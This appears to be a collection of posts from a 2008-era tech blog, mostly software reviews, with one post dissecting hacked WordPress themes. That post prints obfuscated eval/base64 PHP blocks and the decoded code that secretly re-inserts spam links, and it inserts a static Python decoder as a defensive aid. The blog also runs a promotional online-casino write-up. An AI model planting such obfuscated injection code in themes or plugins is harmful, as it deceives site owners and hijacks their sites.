How about a personalised Firefox 3 Download Day Certificate?

Hopefully, by now you’ve grabbed your copy of Firefox 3 and consequently played an active role in helping our favourite browser set a new Guinness World Record. Here’s an added perk for being such an avid follower of Firefox – a personalised Firefox 3 Download Day Certificate stating your role in helping Firefox achieve the world record. I got mine just now and here’s what it looks like…

Firefox 3 Download Day Certificate

Getting the certificate is as easy as filling up this form (with just your name) and grabbing the generated PDF File.

Incidentally, I managed to grab my copy of Firefox 3 only today morning – almost 12 hours after the official release. Last night it was literally impossible to access any of the Firefox download sites due to the initial download rush.

Installation went smoothly and all my earlier settings & bookmarks were preserved – though a couple of extensions failed to work (Fasterfox, FEBE and TabMixPlus). None that I will sorely miss (for the time being), except for FEBE. On the good side, FF3 DOES take a shorter time to fire-up. How about you? How was your initial experience with FF3?

Hurry… Get a Free Membership at a Premium WordPress Themes Club

WPDesigner Premium WordPress Themes Club - Free Membership

BlogAdda – an Indian blog showcase (directory) is giving away 100 free memberships to the Premium WordPress Themes Club of WPDesigner.

Normally, a one year membership of the club costs you $5, for which you get access to 12 premium themes (1 every month). As long as the offer from BlogAdda stands, you can get this for free. No sign-ups with BlogAdda are required. Simply read this post at the BlogAdda Blog, and leave a comment there stating your name & email correctly and include a link to the most popular post on your own blog.

They’ll get back to you in a day or two with a promotional code which you can use at the WPDesigner site to alleviate the charges for the first year.

Alternatively, you can follow BlogAdda on Twitter to claim your free membership.

I had left a comment there yesterday and by today noon I had my promotional code delivered to me. Last I checked, they have around 48 comments on that post (including comments from those who’re following BlogAdda on Twitter). If you hurry, you may still be accommodated in the last 50….

LC ISO Creator: Probably the smallest (and portable) no-frills ISO maker

Here’s a quick pointer. If you want a CD/DVD ISO Image Creator that does just what it’s intended to do, you should try this fantastic freeware named LC ISO Creator.

It’s this incredibly tiny download (14kb compressed) and runs straight out of box – i.e. no installation is required. It doesn’t require any crappy driver installation either. This can make it an invaluable addition to the PortableApps Suite.

LCISOCreator Screenshot

The interface is very minimalistic and doesn’t sport any Settings or Options dialog. It took me around 9 minutes to convert a 3GB DVD into its ISO counterpart – pretty good for such compact coding. It even supports Unicode. Your only qualm might be that it cannot handle copy-protected disks. Who cares! There are plenty of specialised tools for that.

This one’s headed straight for my PortableApps folder on my USB key.

goosh: The Shell Lover’s Google

This one’s for all the Unix geeks and shell lovers out there… Goosh is a cool new service that lets you access a large selection of the Google applications through a command-line interface. The hardcore techies will definitely love the look and feel (and functions) of Goosh. The author, Stefan Grothkopp, made it pretty clear that it’s not an “Official Google Product” – but is there just for fun.

When you first get to the site, there’s not much to meet the eyes except for some barebones instructions and a shell prompt. But then again – that’s how the real shells are. To get going you’ve to call-up the help page and get a list of available commands. The author had the foresight to implement bash-like aliases – thus cutting down on a lot of typing. The alias for help is h and here’s a screen-shot…

Goosh Screenshot

To perform a simple Google Search, you key in search {searchterms}. For example, if you’re searching for pages on AdSense, you’ll have to key in search AdSense. The actual command to perform a Google Search is “web”, “search” being an alias for it. Apart from normal Google Search, you can also fire away shell commands that call-up the I’m Feeling Lucky function, Google Image Search, Google News + Blog + Feed + Video + Map Search and even Google Translate! That pretty much covers the most utilised Google apps. As an added perk, you can perform Wikipedia searches too. Good job Stefan.

And yup, there are localization commands too – allowing you to change the default language of the interface. Also supported are command history and tab completion.

Goosh is based on Google’s Ajax Search API and is one of the best implementations of it I’ve come across so far.

Found via: My SysAd Blog

DNSRank: New kid in the same old block

DNSRank is an all new juvenile entrant in a jungle full of raging tigers. What I mean to say is that, they’ve decided to join the whole SEO bandwagon with almost no originality on their part – which might make it very difficult for them to survive for long.

The site definitely has that Web 2.0 jazz & sparkle to it and is very well laid out. They describe themselves as a “Domain Evaluation Tool” – but I’m sorry to say that they fall way short of expectations in this quarter. Eye-candy isn’t all!! Let’s face the reality. There are plenty of age old predators in this field, starting from web-based services like SEOMoz & Xinu to awesome Firefox extensions like SeoQuake, SEOpen & SearchStatus. Most of these tools give far more comprehensive information and Search Engine Optimization tips than the barebone skeletal outline offered by DNSRank. While utilising their service, I couldn’t find a single tool that could spike my interest… except maybe for the section that displays sites which share the same IP as yours. Then again, there are plenty of other services on the net that cater to just this, as a simple Google Search reveals.

DNSRank is still in its infancy. Running their own tool on their own domain reveals that even the domain registration is just 29 days old (on the date of writing this review). Judging by its age, we can certainly cut them some slack. If they have market domination (or at least gaining a large percentage) in mind, they’ve already lost out in the beginning battle. They totally failed to cash in on the element of surprise (by introducing new tools & tricks) – which is so common to any Web 2.0 startup these days. If they’re really out to set a mark on the wall, they need to strive much much harder than this.

befunky: Cartoonize your favourite pictures in a jiffy

Here’s the latest addition to the Web 2.0 bandwagon – befunky – a quick & dirty way to cartoonize your favourite snaps in a jiffy.

The site sports a simple flash interface that allows you to upload your snaps (either from your Desktop or by direct capture through a webcam) and convert them to cartoon caricatures. There are a couple of easy-to-understand parameters like Sketch, Colour, Warp and Goodies which can produce widely varying end-results. You can crop or rotate the picture once you’ve uploaded it, adjust the brightness & colour levels, apply different warp brush sizes as well as do multiple variations of flipping & layering. You can even add frames, modify facial features (hair, lips, eyes etc.), throw in accessories like jewelry, eyewear & hats and top it up with some custom funky text. The resultant pictures are really cool! Here’s a simple example with the most basic effect applied.

befunky: Before & After

Soon to come is a new feature that’ll allow you to transcend the boundaries of static pictures and apply the same effects to videos as well. Oh Yes! Full-length running videos. Ain’t that awesome?

The site sports a comprehensive Tips & Tricks section which gives you creative tips on how to best utilise the toons you’ve just created, which range from personally branded merchandise to e-cards and ways to spice-up your costume parties. All in all a very easy-to-use and useful web-application that can find a large audience – specially in graphically challenged people, like me 😀 Can prove to be a viable option for those who don’t have access to Adobe Photoshop and its plethora of filters.

Found via: System Hacks

Chaotica: New theme for Chaos Laboratory

Finally got around to doing something that has been pending for ages… i.e. give the site its own look & feel.

There are plenty of good WordPress themes around – but almost all are overused. I needed something fresh and unique (if possible). I had contacted a few designers but their starting prices ranged $300 to $400 – something that I would rather spend on getting better hosting (dedicated server maybe) or on advertising. In the end, what had to be done – had to be done. Got down on my hands and knees and started designing one on my own.

Adobe (formerly Macromedia) Fireworks helped me a long way in designing all the graphics for the theme. Thanks to Twitch for the logo (lab flasks) – that really brightened up the page.

Once the initial issues with the CSS were sorted out, it was time to port it to WordPress. That was the easier part though and you can see the result proudly on display here. Incidentally, I decided to name it “Chaotica”. Yeah, I know – it’s pretty cliche. But that’s the best I could come up with, keeping at par with my site name. Maybe you can suggest a better alternative for me!

There are plenty of “cool stuff” that I’m yet to implement – but whatever I’ve put up so far isn’t bad for a first-timer ! What do you say ?

Dissection of a hacked WordPress Theme (how the hacked themes inject links and how to detect them)

While I was away on my sabbatical (read coping with the all-new fatherhood), I occasionally managed to catch a glimpse of the latest action dramas unfolding on the net – primarily because the WordPress dashboard made it a point to present them to me on a daily basis. One of them caught my fancy and I decided to take a deeper look. The topic was Technorati & hacked WordPress blogs. More than Technorati, it was the article on Weblog Tools Collection that got me wondering…

The premises

While I had made it a point to keep abreast with the WordPress releases and firmly believed that my blog wasn’t affected by this, I wasn’t quite so sure about a couple of other blogs that I had installed for my friends / clients. Going through a few of them, I noticed that all of them had a profuse amount of random & unrelated links in their footer besides containing links to a group of common sites in their blogroll. While the footer links were more or less random (and still acceptable), I couldn’t believe that, strangers as they were, all my friends & clients had managed to put their heads together and point to the same group of sites! Naturally, I got asking and found out that none of them had ever added those links in person and that even they were confused as to where they came from. Being new to blogging most of them had taken it for granted that those links were a part of the WordPress ring and had been placed there as a reciprocating gesture for providing such a terrific blogging platform for free.

The investigation

My first step was to dig into the file footer.php, where I encountered this strange sequence of code. Here’s an example…

<?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';
eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96))); ?>

Looks scary, doesn’t it? 😀 Managed to give me a fright at the first sight too. Whereas I was expecting a bunch of hard-coded links, you get this!! Fear not. A second glance will tell you that the code isn’t really as mumbo-jumbo-ish as it looks. It contains 2 distinct PHP statements. The first one is simply the assignment of the scrambled sequence of characters to a horribly named variable i.e. $Gdb63b0c686622a27d0bdb237219e0e96.

<?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';

This statement alone didn’t make much sense though. It was the second statement, with its share of nested functions, that started shedding light on the whole issue…

eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96)));

If you’re familiar with PHP even a bit, you’ll begin to realise that this statement decodes whatever nastiness is lurking in the first line and then executes it using the eval() statement. Reading the nested calls from the inside out gives the order of decoding: the string is first base64-decoded (base64 is the same encoding that is applied to email attachments) and then inflated with gzinflate(). In other words, the original code was compressed first and base64-encoded afterwards.

To really get behind the mystery code, you need to be able to SEE it. Rather simple. Just replace the eval() statement with an echo and it’ll spit the code out onto your screen instead of executing it. Following that, we modify the code block to look like this…

<?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';
echo gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96));
?>

Save this code in a new php file and execute it from your local php-enabled web-server installation (in my case XAMPP) and here’s what you get…

footer

<?php wp_footer(); ?>

Pretty much, the kind of code you’d expect in a WordPress theme footer. While one can accept the link to http://wordpressthemes.weblogs.us as the default link to the theme hosting service, I couldn’t understand what Vacation Reality had to do with it. Still, so much for the footer. All I had to do now, was to remove the whole block of code and create a clean footer as specified by my clients.

The second complaint was regarding those common links that kept appearing in the blogroll. As it turned out, some of my clients had tried deleting those links only to have them re-appear a couple of hours down the line. Time to investigate again. This time it was the file functions.php. Didn’t have to look far. A search for the terms eval and base64 got me to the desired point. Once again I faced a block of code that went like…

<?php }
$Q0d299dceb2cb08cb71bfbc1414b1505a='hZBBawIxEIXPm18xDAUTsN
pzZb3ISg9tBbvFY4gmajCbhCTbUMT/3m6qpx68DTPfvPdmiJCSi13SzlJUUi
fuXUw4Rm2jComno+oUN9qekM3IvrcFhX9TyuBMqoNxW2HgIXu5nZFK72k
pH+cHlfiXCBQ/mtdm0cJi9fne0mGRa8lguV69wRUdmhE2L826gQL0wdSjY0r
+eTrNOU+yC9IHFWPsvTdaxcnOdSNkdf3ESFVlz6/pSi4RgvimWJSs6BRCPQ
fc3DSgHU6IOAa8mf0R9wwR2O9DLuQH';
eval(gzinflate(base64_decode($Q0d299dceb2cb08cb71bfbc1414b1505a)));
?>

Taking the same road as the first time fetched me this very interesting block of code..

add_action("edit_post","insert_theme_link");
function insert_theme_link() {
    global $wpdb;
    if($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://www.wordpresssupplies.com'")==0)
        wp_insert_link(array("link_name" => "Wordpress Themes", "link_url" => "http://www.wordpresssupplies.com" ));
}

The code should be fairly self-explanatory. What we have is a function named insert_theme_link that adds a link to wordpresssupplies.com to your blogroll (contained in the table wp_links in the WordPress database), if the link isn’t present. The noteworthy line here is add_action( "edit_post","insert_theme_link" ).

The add_action function is a plug-in API hook for WordPress.

  • The first parameter dictates which WordPress action to hook or watch out for.
  • The second parameter is the name of the function that is called when the hooked action occurs.

In our case, the action is edit_post, i.e. whenever the blog author edits a post, the function that adds the link to the blogroll is executed. Hence the mysteriously re-appearing link !
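As an added example that is not part of the original post, the following Python script performs the same decoding statically, without executing any PHP, and reports the hooks, blogroll writes and link targets hidden in a theme file. It goes beyond the post by also peeling nested layers of the same wrapper; the sample theme file, the `$Qabc` variable and the spam.example domain are constructed for illustration.

```python
import base64
import re
import zlib

MAX_OUT = 1 << 20  # cap on decoded size per layer (guards against decompression bombs)

# $var='<base64>';  -- the blob may be wrapped across lines, as in the listings above
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([A-Za-z0-9+/=\s]+)'\s*;")
# eval(gzinflate(base64_decode($var)))  or the same call with an inline '<base64>' literal
EVAL_RE = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"
    r"(?:\$(?P<var>\w+)|'(?P<lit>[A-Za-z0-9+/=\s]+)')\s*\)\s*\)\s*\)", re.I)
HOOK_RE = re.compile(r"add_action\s*\(\s*[\"']([\w-]+)[\"']\s*,\s*[\"'](\w+)[\"']")
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")


def php_gzinflate_b64(blob):
    """Static equivalent of PHP's gzinflate(base64_decode($blob)); runs no PHP."""
    raw = base64.b64decode("".join(blob.split()))
    # PHP gzinflate() expects raw DEFLATE data, which zlib selects with wbits=-15.
    data = zlib.decompressobj(-15).decompress(raw, MAX_OUT)
    return data.decode("utf-8", errors="replace")


def find_payloads(php_source):
    """Decode every eval(gzinflate(base64_decode(...))) call found in php_source."""
    assigned = dict(ASSIGN_RE.findall(php_source))
    decoded = []
    for m in EVAL_RE.finditer(php_source):
        blob = m.group("lit") or assigned.get(m.group("var"))
        if not blob:
            continue
        try:
            decoded.append(php_gzinflate_b64(blob))
        except (ValueError, zlib.error):
            pass  # not valid base64 / DEFLATE: leave for manual review
    return decoded


def unpack(php_source, max_depth=5):
    """Peel nested layers: a decoded payload may itself contain the same wrapper."""
    layers, frontier = [], [php_source]
    for _ in range(max_depth):
        frontier = [p for src in frontier for p in find_payloads(src)]
        if not frontier:
            break
        layers.extend(frontier)
    return layers


def analyse(php_source):
    """Summarise what the hidden code would do: hooks, blogroll writes, link targets."""
    report = {"layers": 0, "hooks": [], "urls": [], "writes_blogroll": False}
    for code in unpack(php_source):
        report["layers"] += 1
        report["hooks"] += HOOK_RE.findall(code)
        report["urls"] += URL_RE.findall(code)
        report["writes_blogroll"] |= "wp_insert_link" in code
    return report


def pack(php_code):
    """Build sample input only: mimics PHP base64_encode(gzdeflate($code))."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(php_code.encode()) + c.flush()).decode()


# Constructed sample, modelled on the functions.php block above (placeholder domain).
SAMPLE_PAYLOAD = '''add_action("edit_post","insert_theme_link");
function insert_theme_link() {
    wp_insert_link(array("link_name" => "Example", "link_url" => "http://spam.example"));
}'''
_blob = pack(SAMPLE_PAYLOAD)
SAMPLE_FUNCTIONS_PHP = ("<?php }\n$Qabc='" + _blob[:40] + "\n" + _blob[40:] +
                        "';\neval(gzinflate(base64_decode($Qabc)));\n?>")

if __name__ == "__main__":
    print(analyse(SAMPLE_FUNCTIONS_PHP))
```

To check a real theme, pass the contents of each .php file in the theme directory to analyse() and review any file that reports one or more layers.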

The nexus

Hot on the track, I decided to follow the link that was being injected here.. i.e. wordpresssupplies.com – just to make sure this wasn’t a random case and I am not tarnishing their reputation anyhow by unjustifiably pointing fingers at them. I dropped by their site and picked 3-4 themes from different categories. And what do I find? Every single one of them contained similar code – both in the footer as well as the functions.php. Not just that – studying the links led me to two other sites teeming with hacked themes. For your convenience (and warning) I’m listing them here.

  • http://www.amazingwordpressthemes.com/
  • http://wordpressthemes.weblogs.us/

All of them are nicely decked-up and look like legit WordPress theme sites. But be wary of any themes that you download and use from these sites for they’re certain to contain such code blocks. Apart from these links, you may also notice some other random links being injected – links to car loan sites, cheap dedicated servers etc. – shady businesses which have probably paid the hacked theme sites to insert their links and thus gain PR (pagerank) out of millions of unsuspecting sites utilising these themes.

I tried doing WHOIS on these domains, but that’s where I met-up with a wall. They’re either cloaked with Privacy Protect or contain spurious information regarding their owners. But I have a feeling that under the hood, these spammers (I prefer the term spammers here to hackers – as the people who’ve injected this code into the theme are nothing but link spammers) belong to the same group or it’s the work of a lone individual.

The Filipino blogger Yuga outlines a couple of other methods followed by these spammers to capture / break your WordPress installation. The article is a must read.

The conclusion

On a sidenote, these themes can still be used if you carefully snip the spammy code out. Normally, the code-block in functions.php can be entirely eliminated without affecting the theme at all. As for the ones in footer.php, you’ll have to study the underlying code and eliminate the links to these sites, keeping the rest.

For those who want to experiment with such themes, I’m listing a few here for direct downloads. Disabling these themes or switching to another one will (normally) get rid of the injector code – but even then, USE AT YOUR OWN RISK.


If you manage to dig-up any other hacked theme sites like these, make sure you leave a comment enlisting them. It’ll serve as a warning note to all those who read this. And of course, if you have any thoughts to share on this issue, feel free…

Getting back to blogging…

Finally… decided to shake off that writer’s block and squeeze some time out of the demands of fatherhood and get back to serious blogging.

Oh Yes! For those who didn’t know, I was blessed with this beautiful little bundle on the 10th of February, 2008. Life has never been and never will be the same 😀 The bundle is a “he” – i.e. a son and has been nick-named Adi (which roughly translates to Ancient or The Very First). He’s an absolute delight to be with, though more than a handful, when he realises he’s home alone with me. More on that later…

Other than that, Google decided to strip me of my pagerank, which stood last at 5, as I was involved in paid-blogging – a policy that sent up such an uproar all over the blogosphere. Seems like Google decided to take it all out on the smaller sites (mine dropped to ZERO) while just marginally denting the bigger ones. Zero is where it stood for several months – till a couple of weeks back I saw it jumping up to 2. My site’s crawling back into the PR space I guess. Luckily, it didn’t affect my traffic anyhow and although I had stopped blogging altogether, the older content was enough to keep up a steady flow.

On the professional front, my work-load has tripled. Learnt many new tricks (I had long wanted to) – such as developing a complete WordPress theme right from scratch. I picked a template out from the free ones provided by TemplateWorld and got going. The result after 1 week of messing around with the WordPress Codex can be seen here. I’m kinda proud of it and I must say, not bad at all for a week’s work starting from level zero.

Updated a few of my WordPress plug-ins too, namely curreX and LiveSig – making them way cooler and better. Also shifted the plug-in base to the SVN hosted by WordPress.

More later… in the upcoming posts. I’m teeming with ideas and the next few weeks will see plenty of them pouring forth.

Cheers!

OnlineCasinoBluebook: Your ultimate guide to online casinos

Does that risk-taker in you make its presence felt every so often? Does that involve gambling? Let’s face it – all of us would squirm inwardly with pleasure at the prospect of making a quick bundle online. And many of us have tried out their luck sometime or the other. To cut our work short for us, there are millions of online casinos sprouting up at every nook and corner of the net. But do you even know for sure that the casino you’ve blown up a fortune at is for real and not just some scam site designed to make you part with your savings in the shortest possible time? If you’ve had panic attacks on such issues – fear not, cause Online Casino Bluebook is here for your rescue.

The site maintains a nice list of the top ten (and legitimate) online casinos along with a couple of pertinent factors that can help you choose the casino that is right for you. These include the world rankings, welcome bonuses offered, payout percentages as well as solid reviews. The listed casinos are the ones where players will be able to play number one Vegas style casino games like craps, baccarat, blackjack, slots, poker, keno and bingo. The site maintains separate listings of casinos that offer a single type of game only (Poker, Bingo, Roulette etc.). They’ve even dedicated a section to No Deposit Casinos where you don’t have to pay up a bundle beforehand to start playing.

If you’re in a dilemma even after studying the list, you can always get in touch with their support team – who’ll guide you through the process of picking the best casino tailored to meet your needs.

Been cheated/scammed by an online casino ? They can advise you in this regard too, or just point you to sites which act as the casino watchdogs on the net.

The site has a very simple yet easily navigable layout – with easy access to all the important links that you may ever want. However, it could definitely do with a face-lift (a better template, that is). End of the day a bulk of the netizens tend to trust more of eye-candy sites.